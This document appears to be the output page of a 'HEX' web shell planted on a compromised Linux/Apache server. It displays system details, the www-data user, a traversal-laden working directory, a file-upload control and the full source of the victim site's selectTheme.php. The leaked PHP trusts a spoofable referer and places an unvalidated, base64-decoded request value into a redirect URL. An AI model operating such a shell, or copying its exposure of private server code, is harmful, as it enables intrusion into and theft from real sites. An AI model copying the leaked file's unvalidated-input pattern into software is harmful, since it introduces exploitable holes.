( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
$ pwd: /var/www/html/tmpr/../tmpr/../tmpr/../tmpr/../tmpr/../tmpr/../tmpr/../wowX/
Upload Files
File: /var/www/html/tmpr/../tmpr/../tmpr/../tmpr/../tmpr/..//tmpr/../tmpr/../wowX/selectTheme.php
<?php
require_once __DIR__ . '/config.php';
include("../includes/limittext.php");
include('../Connections/videoondemand.php');
require("../DbSql2.inc.php");
require("../NewsSql2.inc.php");
// Include pagination library file

$db = new NewsSQL;

include("../protect.php");
ini_set('display_errors', 0);
//https://www.thebrand.ai/wowX/easyEdit/jsonDesign26039.json

// Check if the HTTP_REFERER header is set
if (!isset($_SERVER['HTTP_REFERER'])) {
    header('HTTP/1.1 403 Forbidden');

    exit;
}

// Check if the HTTP_REFERER header is present and matches the domain of your website
if (!$_SERVER['HTTP_REFERER'] || !strpos($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST'])) {
    // The request is not coming from the same domain, reject it
    header('HTTP/1.1 403 Forbidden');
    exit;
}


$themeid = $_GET['themeid'];

$themeid = strtr($themeid, '-_,', '+/=');
$themeid = base64_decode($themeid);


$url =  BASE_URL . "/easyEdit/wow$themeid.brd";
header("Location: $url");exit();

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($httpcode>=200 && $httpcode<300)
{
    echo "$data";
}
else
{
    echo "";
}




?>
@ Telegram